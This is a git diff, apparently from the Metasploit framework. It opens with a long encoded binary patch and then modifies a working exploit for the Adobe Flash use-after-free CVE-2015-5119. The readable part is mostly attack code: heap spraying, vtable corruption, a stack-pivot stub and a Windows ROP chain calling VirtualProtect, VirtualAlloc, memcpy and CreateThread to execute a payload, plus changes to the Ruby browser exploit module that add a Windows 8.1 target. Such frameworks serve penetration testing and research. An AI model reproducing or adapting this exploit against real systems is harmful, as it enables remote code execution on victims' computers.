zF%+qRU>GtH#=Tmar3OquT2ZjZTewl(lg~5G3^bc`$S<R1Vi~RYwA=HzaZ#38C-Ev%
z$tig|*rT3|VQ`Po`e^zMeB`4lp6ud-velwRgC+VY(WI&Veqp()!5rLzBk#q<vd2>T
zu<<z9!9{4^b3;3N9T#7}-l7Mp-veHC7Qj>B6>3l=p9C%`n|PTiWo`+ISE?F#>2D$B
zKBU|Wve63z83&`shib5D>O(vF+#Jyl>ecT8eSG!@1Xih9Bp7<%4?b~LLYRbc9$1`~
zv>3)%S?0|TLa4QU*im#1Z9g4YH)zogV$bPdVeYCi@|uY9E=+QmP`?C1NIo6L*~Nq0
zpo6O?ZUWNbac!nIuVz}{ymC-|j`M2JymD{u7|p9GXkJYwXkNp9S(^RITUA`ph)=_t
z{N;Nu?2B`?Kgj3fFz{}&i|a^5bBTAog<ePgQU^sN4CvD^Dk0Qdt?FTKXY1gO-LD$-
z<k14w=vPgIaO04}<tQ~46f~E3ki)(L3>Jv2QG?(#esXDdM5EXlOc>GwLjGcgt|CNE
z0+pW8X#%P_(I;(B+|O08xxE-5hB0!W-qxx*sKr<N8{8pL*<Td;i((M7j@mR_+9rT|
zw#p_j#R)nHSpTJ)aA?A@$p&ijwSMF<ygxZ4o)(IH)a-_qk5S9|FOVQiOsaYURNn|O
zOfY0Y_2&1Ol8X<-T|&-DJP(_c0TdTGZsIk}K;=!O3@J3}<19w+9_#Jnp23k1s6t#S
zl6eMp6+Mpp7VgQ&x5K6ka)nJ<ubVlHTN^iX1os?z7TspE%K{KF(H>$m`Hqpabo8WN
z<#IXhRB(4!%s@d@P(E{1+zBc`w?SLf03#0L?H9wnVC`ssPUaXH`Jeknegl@Z92ah;
zgSnZptogXmaB*=n_kynpM;X=&r$gWjZV88~Pl4%#SqMGCPR}C%hg;PExWhZa;e1Y9
zqSahm8B-KPlC03^^;aP->2)bCaVahV^4l;1)o%qq>4?H7G6&dQ1MBMSr&){ZN2S$u
z_D<H4E3XlQ8v9X%+f}^!swoS;lBW$=zD{Eh_Bcka`Vip$wBck<2)r$<hGApYZ9Rc&
z(+-$|fX<6mK)6p(tFM){>UFEDy#usWrc>HWyA6HvJp*dwU>l5!+LLO<wbxFya3a&=
zkEEu~{s6h&rS@}Sw_DXAyq2k6*z)y>nR2N)5as%;NIfTfB>YF;L_qFmeYDc-0Xxt`
zr}VPDTfp19#Y*4tKwA8a2U6G=#XEj3u+os954ggH?zY{yhpPICiVF!+9Hn?9TR!x5
zdLP10FYt4-fY5wIq~#;bM({;(^GAl}^^UKD3m@5-^zBL?eZtb}{h_Z`=pz{{$5*jg
z{A|VJ9;u<%`#F!^tkS17L;McHKqb-6Rc{z~SN(k%{=4c;1=N7V1*SkgTJ14Wfh6!E
zQ>tIb9<M-}hVUP$wO@_{AQ|30fZ9;y#Al4Irwe`fOjHh!*KYO4#)z6pV>3$R%|D5}
z;gP>POxVJQPrUZPMa1f{+pzs*oewROOrih&srM3f*eVTpPT;4J&kOvf`32ZHhfMP%
z?3{JZpM{-sK<O3uapa2vKLL6PHqK0WS>Pu?ufV>UDX$7egp}8WVg{7gg%SxUZwRGo
zkn&rh3>c#9g*YjokI0Vnw=v#Pz1womaB?^^=L{7MVQ(NuA1c7y;r3-8SP<E}gDVAo
z%D2^|Px<7l^bsFa*{|Y*f^X0k$)(T{k6&Gi9KqV40~d+I);Nb}16CgI4ISDmfwdi|
zH1Ma$jQ<?W_&h$sIBz6BHZ0Zt*hqe2SepHbk-T770sDfH{M4{?`%@$NnPCO(&y3_n
z!wT6K(drMXfnY%YigzJ_XC-)$H$cG;SaO*+$=vBmBCXfHLodY-sk#X0%XKf{2zsaP
zurup`joJ5<_94Bg^Ts`W&gG-WKeUUWC?({_8{y~?)sHpa6p6Ql0`zh~qUJleOOo46
z-0-^ftsk@KO@vu4YG8qK-OOnwx0_w9r&+X+PczJ>K8F6IV^pY&Jv87}j*i`15oIZf
zw*{@_z;F)guJupAK~mkZIGz`M2!wFl2;q7gz;`LBPmt<RRmlNVYNL0@Kv=M|YdynK
z7qH3&hz|gQD%D;Ut-GPR)PrC9EK7ZgwU1)$PqFrQu?m-uiuL|+0+&0?Qb)n{4b?+E
z^b=;O%9CYP^!2fU$p1N?f3Jssz#c9dYl_v>ZrbINY=K26y9XxzJj2;U8K*uY#795{
zrUW*9)p$>ihJZD^f^@L;O@VUHLG1yI&cdiqiU`BC@?zd?{)8!L6;IPq<WNxBI~Dsw
zhUqyvaQuki^UPD`XH>k$JWqRn2uXUg(9yWQ==bp$&K-(h?R><X!~;T&-GUJiWPrQO
z??mA=91uTyQ{04xN|{2H#5+O(W^V~-)tg{n5nx(23lp1oR}eQ@5EsGc5I*n0z*FW7
zlWGmjRyLJ~+-a7Wz*YN<U(nqU^FBd1%gA&Gmg*rcaUa*H?%DFXXZopoh9xFK-LtqV
z9|ke$!R;i0UM!~lR!iP+km2UMp?Ne08g%=3h6L{Q;iJwH%4>0sT2O5F5yf^5#n=up
zE{SpwG;>RB0F5>e?J)2=?gf4*6>r-KqIE!PO7+iE9}Zgfdvy13gf3{R@QWx|-W*JD
zw|tb)_`Cr|<-k9X3HN2<z(1^WObvwf;LCJC+6%6wFHR=|Wqo7DM|4_h^Y4XL-$=TG
zp&pJgR0v6e6@!Eb!0qU{B^0cF6-E?dK_~WSB^836=(tbCZ-k3#RNt7(mG^`4EMo+e
z#Y2=;ps8sB`zh%QAn@KrqT*l`oT{4P#VUpA$74jOT16*^pbM1^1`fv_eXRq9ys4st
z?rOh>v((_jaxOu=Jw%a9yw^IePQztm(*RgE#&W63J*M1i%6+EXZ^{Fve9DvuO?k+a
zPn+@?Qyw<u5mO#D<uOwpH)Yn8jwxMJ=1h6Qls%^GHD#YEpEc!krhML%FPQSADPJ_@
zOQw9;l&_d~UT2Tx$#ER|u~g{E(x5LZ0KHi{^k)U3M=Jz<T4CtbV$iQ;K+hJ3zAXX0
zTiCx90S>Gx;K3RITv$=y!>R^OtQhcO4Fqni8sNvO1&*viz>_r?xU#MSzO1W(GiwO&
zW?ci^S=R!8RvmC?4Fw*pVZfyo9~HO9@#MW+z6v~zhIEuFUjvp$%hwTn11gV}zlC<A
z<(uXxO}<5CZ)4f-2z&>@cL{tK!S`S=qvh`r`~zX%NAUF$$qxwp0KroPo<i_6jC`~_
zgWy@ho<;CO0zX9X9D(N${0PJ{TAoMnW01yZ`3Zs-sKNyVKPB)p1jh>m#|r>25;l+6
z_6UOQ5dg<VaNJ`N97ou32;NKJy$Fscumi#S2%Lc6#E3OyG^7CDPuTkrd>~>4M$1VE
zK1kRH5qyZcn2g{Q0;eK4jVeq>u#><U2+kyMCW5mFoQ2?QqB{q{xrCjE;QWYXj+P4$
zTu9i3M15fd=IP-`QQ(URy9ldw5q2?xOCna)Xt@-@WrSUZ;3E-BjFyigxSX&n5L`(V
zRw39;;A#ZdP=&P!t|M?Am94|>*O#QaAz}^kNj?^_3?JMWv99vLO%dyAAKV<VqCU8#
z#L3nYxQ*y;LvVX(gpZdh?1)(L(eeodpNv?c(Q+q(yCOw}*iGPDr0s8^M(-iSUaYo{
z!2JjwAn*W!PZ4+!!9ykaJzWByDS?Me;Dl12M@rz)5_l|9G=$?NFiYSbHcB1!Bl}*S
z9M7c#gQls2xduPtf-=Zl1pLSe#Gy)&^~xT^VSBP**^3a`D-Ds%l?;^xBl{xYdC*wN
zOy#p!1+A2nk<^E@j?7g)hgnn;GFkaNLN8!)5)+&W`64Db!SW@9(4I+~$g1San4n>k
z(voq&d|94_lWogaBG3X&n^co@PQFTmiGc4z%^+)+uOsdaOn!^Wn-Oq@Xewkn@-0l>
z#st+~{w@MO@*T{gK9Nq-)Pi1v-+UJ#bQbbGgno}z(2bD3z$8KP2ZY|o<O3Rh1UxNj
zG&vS|8YP5&MV_GnVuHSfyo&q~p>vo_kAPc7pF&nIKf>fZCg@z`$C!MA2|5_EE3yx=
z4DvMc0#5v=Sa66~!vy_~yod=p81g+bkJ-7zMwR6$sT^Acf<+yb;}CZ*CgU;bz~nwm
z(17HGDo7?`_I^wrz+_SttR1M-@<Gf#gvn$~reHD^lWCYtud=QkHBq(4^JE8yRRb0a
zSZZMGb+~v8m7P_Pz&s2c6$I<W(qUK{1pC_%0fz~!gE|a??2IZov&x$cb(A(rw>$93
zN|pk)TeBlm9o)(MLA1yEa`76xo>UuiE+Oz%(#NF6@)nlX6HJAY#QOqYlsGEByRQcd
z<9!OfZbf~!qPj~R-Uik0Ep(U~$Gx7~^jy5#3lP$JygTNzQR=dz0S{nrlDIj{RYtET
z=y*zIN49+6A5YcR*{4{`DL*%;&K}Zo+RqHGv-7w|?okWx_n*b)nhDL%i1=Ms+552g
zx&98eo~K~`#}JkmMhW2sUg#QowU$ZTaVa94#8tfNz<9nB!X_Q#jy-)?o-3BWo6qOm
z0RlJ8IlP@eE3`%$+6(xNzW!5+iRmyDH>HlGXH+O02SWW=0^4~ZFl{;S@v6}aoLoAX
z8jES>L+=#*L$NoAr>M2B<@0H%R|VU=oQvD+4myH8scJBZzsZio*JMV0qcOZO`YY(5
zS3V?M|Mk&dz+h)rx&G^;Z$fU4pVR1N(p*0mpqEMW{G48VnG~cq5<#Y2voxO%cIETs
z{{c!-UQ~4$_rLj<k45>?IYJ+Z$lvF?mIC8S1vbV8gFgA033T;HHKX|9N8$Pse-6fQ
zTAt@}epNcyB^Ok6$;qPWd9L9@B9ssQ9#RjACs%s{W(=h9lB#*982C8K<H70Zvs4Is
z@R&L0banLMg^OEz3Z@VmybRGsKyUNjNQFTC=_#ZO+jFlqhP!=E*(6<$Or?YPqaOIa
zZVJcS`zc(*Ks=YGpAzyXtT&%eg)-+vJeT-L;F-@Wpr!%+MgKvTF}zI-?;GBx4{r<B
z`%mdz@1TOgG!G;JQ8##Uk)-!%s8T#SmENduj|C)?)~mmXPYJCNHNZtZaCrk|lQnd&
zI12)z7$N@FE7wu!>)QlQF8l!=(jxXP4Blhc<As&8*4Ngwu@?XDjOoy?fKhr&6UJa4
z@HIX<Z2)dBPxCaZwLOu(T4~;|6;Gef`!;-aojn%q@pZNEea<Ph@PW=|BYxKqyB2V#
z`!nG)bW9ErOUqQAn93ot{Fvg+vzOsNA^e9#Bo037h><zYtML}>h|x0HXqs#&t;e~C
zhKlDZnf|Ek4cU3RM8((3{@wEw!>jZ$UAa%AEB9DmynPtBTYTPu?`=XY7X*a8V5NBZ
z8O~;=7~|Sl^iGURSvouvy>)8Xg!W;m`il&@fxMM2-{%<Zk%qRQOAl=7@qtYmGKIUG
zhPKeJ3X>Dsh(|flWWLdO3kz3+B{Igsc#rrAsC6*(PZgXE>-8dJ<RpZ4??uQ(PB6-z
zV&J8fa7b}<XhIj75HUMm#OzjsBDD;2nue)Ri1l5k^;6NZ$#9!C87T1!Ws>`p?v;u!
zk(c5Oen#)Q=m=oCL62nMFAW-%666OoE|%VY&Ba%0`F`8XH`=f9+FS#5+O=Yv1=wb6
zDgQ9$$CdJ3n7^0uSNk+gpXNrxe-DPQM@uc1Vv7z9W%{7zby2vFTVP<UKHJFA%StEL
z{HUSbjxA(Y6`kBFHFP8QnLuRIXW;ce6K%nki=yeGP}(mFm{EEq=YRx&jg|;q=ru*u
z_DJg-!#f+UqG(@a+D%Nyn%y+<A-8p$nQfVAG|e;=dj@_$VPx(#Q(9)cna!*<@E7Sy
zxLG`#Szm#>mL5N@tH5=bnfsveE>@15U}h#(Ao0ap^CR?V=RSOu8p3acN<-?)ea?vF
znyTC;6jlzP`qumZlo5P6Zrxn-119o1K|@PUcsk+zkPJ+EHJu~EjN;weYSA({H8?Yq
zHw~tD64^MiH5{jTxZQ=x!<fuPRh~!+67|W^>y}jpI)?kTfEF|^;;TyNK6VD_6K}Ch
z5iE`IWItm(+0QJU>~GvB`x|!=$zoQaLnhlnynD(E<!3CLd5j3tdl~$uu7|#<tHWOm
z0f`LpS~pKJ6~BgBUIR*Cz<!BVR)RviJ@7B9)V1o{e4epiJ)&j_dP#j#eTN|B0h)~O
z;8pla<8voqx&g`TE6u_r6n5y>z9D;)T4sF%z26J!G@3d=#irw@SccO&-|$Sg9;wwA
zs1-V&QRuvYn0_guvw*<Y$QnM?sR0HWdNQ+&-Mx<6I?G@h{hY}|RCq(7a8Ic)3t4au
zq&6!^Z6<3WJ!rg1>&f8WOL+F@EOpHUV7@qAeZI&8zDKP78i;T(JzOik*&7@HYA(Il
zbLqvNE7w((KTf_xL2{QVNC}e~n#qDTZZHbZ*h;LK;Kaeai+WOG4TXG}Xm8i5udhc%
zSgk&(?(tM&iiQugMuIExgnr2ouKYfFs#bWR-EYGJgI@DO?y^VLL<B$mtVdn=LMb|#
z2hGYi-qSUIy>qge*+%P8dVoy|&`eYxHp<22^<UJcFJP3cq^z$QME3{2uJlWrnmDP!
z8*#~O8SEselW3%<B3`d$L}zNHNA|O{iXG8xt+cMs(eO#?PYUb$7Q>;L&1N1i>P6vc
zeI=&zGR(BgFf%JK(A(V7I=l_n;dvxwMlZp)p@`>G1^V)1i;<a!brw{h<|Arh1!^Ip
z9<D$wLe!!P)M7++RiKt3YOz*)YzKpH?lw?(O8^xN9rVl>H(Fba=H=+wwi?y6XMy}`
z10T+BHGEEEwIz=?tza465AG3<v7h<iVk7o9rK&|E^7)Q^$Dh*a-jp_Yy=RsfphoE;
zOxm6f_Up%@K8FszFo&fbAKfg~G#L0*ILfX5whM-^28J*kh5!|okqb|GV!)*U{}xrj
zTWJU}{Zd5drHE;lB4!p5__(oPSiraA>*}K#YUGdcCkae1uDGVoehBvVX4(6kYwPOl
z$wteRavc8T-LRIaexspvcBj!Yt-Qi8sIUpgx10oUYx$#|X&juQJ&h-)b2*vY(|NL!
zgX6S2d2$AqV-0%-PtN4B!?0)KA<YUc#6sb#z2{*Vw%!rUrbG4)*ffUiC$Nu|&_^hY
z&$}~E81zII{x+tjo2goSFt!R-icokMdA3e7wNj*3iBz{pfpuqqN@g=_8jP>RyS2g(
z{LP@DXd_eC!hd(gakPV>pVc&$;pJnQ#bqbAXYtDi1@+fxp>QZX@N&+fY^@dsrs}-U
zQ7-4IX{UkD{nimnSL06)RIqd%va}QFtk>{H_*kHvso7l4<o0ZyoWtd8ZqMP#xm?cW
z_FSHv$K`x(&*RDYTrTAHe4bpu<sxn`;K_wtF6Q<^o_v_grQCj)Cl_(~2)7sUWEYpq
zx!uK+i@99M?ZrH~gv)MjFX73hT(05vQl4DK<vMOJ<H<+3+`#Qec=Ay$H*)(?o?Oo5
zW^OO%$rW5~<@O4mT*>8jZm;CYRb1}i_9~w2=JH8yck|?GE_ZQzHBYYLau2uH@Z?%9
z_i=kIPp;$g0Jqoi<a#a-a(g{bZs781Zg1ep$GAMq?Z<d>BbP_Hy^$w3ae18En|N|F
zmkzf#^W+vTbKKs-lUup$;r7-tz1zlRAGf#h<aREf<Mwu*e4NXP+<u%VcW`-<+dFvj
z2`*pa_7gn$B$uyn`$?YM$>nR@-pP}@xO{`#yLfUpmv3@=H&5>2@@;PK;mN&RzQgUk
zJh_j{_qe@}C--yt2X61@$pc(|!0iJ(`4pF@x&0JR9^~>Yw-2K3Y{1X6LWZY1ci?vb
zk7+t+A81p{u9C(y?K1GS+D0<uS}2=U&=c*h>p@3$p^j|Q3O_J%h~KHS9zyz?E0?A%
zTJd)se51ah&fblUw`zq`!l$&t3Bw#SewSrmgHK+FG&uI;aUO3yj+75oQhvHfd9F|S
z#ya~5QhrABKV2?qZWgSF+gT)YSi_f_0}2Ab2$41eN3@_uL1)X*q7<^3qejzEy?rPh
z=N;7wKLI+gB#e3x#!zT}OzY=J<hZ7>;+K?;{k)NN?PrZ_&dyR~>OvZ{PZ(&tC&}#`
zGqTxCpJDf6>#SD%wUJ}EvN@%E7V~Z??_xez%AdgeiBi57^F12g@Oz6hb<kU?@GMs7
yE9IZZ{IjL}Nz6Z|6+Q->?~8nRoqatJGI1xbeE-*@@BYP4$0)Y}{C@yz$&;W|r8+PG

diff --git a/external/source/exploits/CVE-2015-5119/Exploit.as b/external/source/exploits/CVE-2015-5119/Exploit.as
index e80733e3f0..dcd43c5532 100755
--- a/external/source/exploits/CVE-2015-5119/Exploit.as
+++ b/external/source/exploits/CVE-2015-5119/Exploit.as
@@ -8,22 +8,20 @@ package
 	
 	public class Exploit extends Sprite 
 	{
-		private var b64:Base64Decoder = new Base64Decoder()
+        private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
-        private var os:String
-		
-		public function Exploit():void 
-		{
-			//trace("Got to checkpoint 0");
-			if (stage) init();
-			else addEventListener(Event.ADDED_TO_STAGE, init);
-		}
+
+        public function Exploit():void 
+        {
+            //trace("Got to checkpoint 0");
+            if (stage) init();
+            else addEventListener(Event.ADDED_TO_STAGE, init);
+        }
 		
 		private function init(e:Event = null):void 
 		{
 			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            os = LoaderInfo(this.root.loaderInfo).parameters.os
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
@@ -31,7 +29,8 @@ package
             payload = b64.toByteArray()
 
 			removeEventListener(Event.ADDED_TO_STAGE, init);
-			MyClass.TryExpl(this, platform, os, payload)
+			Logger.log('TryExpl...')
+			MyClass.TryExpl(this, platform, payload)
 		}
 	}
 }
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2015-5119/Exploiter.as b/external/source/exploits/CVE-2015-5119/Exploiter.as
index ecbf56fac5..e7ef880af7 100755
--- a/external/source/exploits/CVE-2015-5119/Exploiter.as
+++ b/external/source/exploits/CVE-2015-5119/Exploiter.as
@@ -11,27 +11,33 @@ package
         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
-        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
         private var stack_object:uint
         private var payload_space_object:uint
         private var buffer_object:uint
+		private var magic:uint
+		private var magic_arg0:uint
+		private var magic_arg1:uint
+		private var magic_object:uint
+		private var magic_table:uint
         private var buffer:uint
         private var vtable:uint
         private var stack_address:uint
         private var payload_address:uint 
+		private var stub_address:uint
+		private var stub_space_object:uint
+		private var stub:Vector.<uint> = new Vector.<uint>(8) 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
-        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
         {
             exploit = exp
             payload = p
             platform = pl
-            op_system = os
 
             ev = new ExploitVector(uv, uv_length)
             if (!ev.is_ready()) return
@@ -49,9 +55,18 @@ package
             cleanup()
         }
 
+		static function Magic(...a){}
+		
         private function spray_objects():void
         {
             Logger.log("[*] Exploiter - spray_objects()")
+			
+			// mov eax,[esp+0x4]
+			// xchg eax,esp
+			// rets
+			stub[0] = 0x0424448B
+			stub[1] = 0x0000C394
+			
             for (var i:uint = 0; i < spray.length; i++) 
             {
                 spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@@ -59,6 +74,8 @@ package
                 spray[i][1] = exploit 
                 spray[i][2] = stack
                 spray[i][3] = payload_space
+				spray[i][4] = Magic
+				spray[i][5] = stub
             } 
         }
         
@@ -76,6 +93,9 @@ package
             main = ev.at(pos + 1) - 1
             stack_object = ev.at(pos + 2) - 1
             payload_space_object = ev.at(pos + 3) - 1
+			magic = ev.at(pos + 4) - 1
+			Logger.log('magic: 0x' + magic.toString(16)) 
+			stub_space_object = ev.at(pos + 5) - 1
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }
@@ -98,6 +118,12 @@ package
             vtable = ev.read(main)
             stack_address = ev.read(stack_object + 0x18)
             payload_address = ev.read(payload_space_object + 0x18)
+			stub_address = ev.read(stub_space_object + 0x18)
+			magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
+			magic_table = ev.read(magic_object)
+			
+			magic_arg0 = ev.read(magic + 0x1c)
+			magic_arg1 = ev.read(magic + 0x20)
         }
         
         private function corrupt_byte_array():void
@@ -138,13 +164,7 @@ package
             if (platform == "linux") {
                 do_rop_linux()
             } else if (platform == "win") {
-                if (op_system == "Windows 8.1") {
-                    do_rop_windows8()
-                } else if (op_system == "Windows 7") {
-                    do_rop_windows()
-                } else {
-                    return
-                }
+                do_rop_windows()
             } else {
                 return
             }
@@ -167,88 +187,20 @@ package
             var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+			eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
 
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            // Put the fake stack on memory
             eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
-
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-           
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
-        }
-
-        private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows8()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var advapi32:uint = pe.module("advapi32.dll", flash)
-            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
-            var kernel32:uint = pe.module("kernel32.dll", winmm) 
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
-            var createthread:uint = pe.procedure("CreateThread", kernelbase)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
+			eba.write(0, virtualprotect)
+			
+			// VirtualProtect
             eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
@@ -257,14 +209,14 @@ package
 
             // VirtualAlloc
             eba.write(0, memcpy)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0x4000)
             eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
             eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
             // memcpy
             eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
             eba.write(0, payload.length) 
 
@@ -273,13 +225,31 @@ package
             eba.write(0, buffer + 0x10) // return to fix things
             eba.write(0, 0)
             eba.write(0, 0)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
-
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
+			
+			for (var i:uint; i < 0x100; i++) {
+				eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
+			}
+			
+			// VirtualProtect the stub with a *reliable* stackpivot
+			eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
+			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+			eba.write(magic + 0x1c, stub_address)
+			eba.write(magic + 0x20, 0x10)
+			var args:Array = new Array(0x41)
+			Magic.call.apply(null, args);
+			
+			// Call to our stackpivot and init the rop chain
+			eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
+			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+			eba.write(magic + 0x1c, stack_address + 0x18000)
+			Magic.call.apply(null, null);
+			eba.write(magic_object, magic_table);
+			eba.write(magic + 0x1c, magic_arg0)
+			eba.write(magic + 0x20, magic_arg1)
         }
 
         private function do_rop_linux():void
diff --git a/external/source/exploits/CVE-2015-5119/MyClass.as b/external/source/exploits/CVE-2015-5119/MyClass.as
index 562151e737..8556ff6c16 100755
--- a/external/source/exploits/CVE-2015-5119/MyClass.as
+++ b/external/source/exploits/CVE-2015-5119/MyClass.as
@@ -12,6 +12,7 @@
 			_gc:Array, 
 			_va:Array,
 			_ba:ByteArray,
+			_corrupted:Vector.<uint>,
 			_isDbg:Boolean = Capabilities.isDebugger;
 		
 		// define malicious valueOf()
@@ -34,7 +35,7 @@
 		}
 		
 		// try to corrupt the length value of Vector.<uint>
-		static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
+		static function TryExpl(e:Exploit, platform:String, payload:ByteArray) : Boolean
 		{
             Logger.log("tryexpl")
 			try
@@ -55,7 +56,6 @@
 				}
 				
 				// find these pages
-				var v:Vector.<uint>;
 				for(i=alen-5; i >= 0; i-=3)
 				{
 					// take next allocated ByteArray
@@ -67,17 +67,22 @@
 					if (_ba[3] != 0) throw new Error("can't cause UaF");
 					
 					// check results // find corrupted vector
-					for(var j:int=0; j < _va.length; j++){
-						v = _va[j];
-						if (v.length != 0x3f0) {
-							Logger.log("v.length = 0x" + v.length.toString(16));
-							var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
-							Logger.log("v.length = 0x" + v.length.toString(16));
-							return true
+					for (var j:int = 0; j < _va.length; j++) {	
+						if (_va[j].length != 0x3f0) {
+							_corrupted = _va[j]
+						} else {
+							delete(_va[j])
+							_va[j] = null
 						}
 					}
+					
+					if (_corrupted != null) {
+						Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
+						var exploiter:Exploiter = new Exploiter(e, platform, payload,_corrupted, 0x3f0)
+						Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
+						return true
+					}
 				}
-				
 				Logger.log("bad allocation. try again."); 
 			}
 			catch (e:Error) 
diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index be89cf6b82..72a08ae5dc 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
@@ -68,8 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote
           :flash   => lambda do |ver|
             case target.name
             when 'Windows'
-              # Note: Chrome might be vague about the version.
-              # Instead of 18.0.0.203, it just says 18.0
